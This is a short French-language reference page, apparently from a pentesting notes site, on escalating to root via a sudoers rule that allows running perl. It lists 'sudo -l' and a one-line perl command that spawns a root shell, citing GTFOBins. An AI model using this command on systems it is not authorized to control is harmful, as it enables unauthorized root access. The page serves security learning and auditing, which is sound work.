Sudo (Perl) - Linux Privilege Escalation

Lors de l'analyse des droits Sudoers, on remarque que l'utilisateur a la permission d'exécuter perl en tant que root. Cela peut être vérifié avec la commande suivante :

sudo -l

Exploitation

Pour exploiter cette configuration et obtenir un shell avec des privilèges root, il suffit d'injecter la commande suivante :

perl | GTFOBinsgtfobins.github.io

sudo /usr/bin/perl -e 'exec "/bin/sh";'

Mis à jour il y a 12 mois

Ce contenu vous a-t-il été utile ?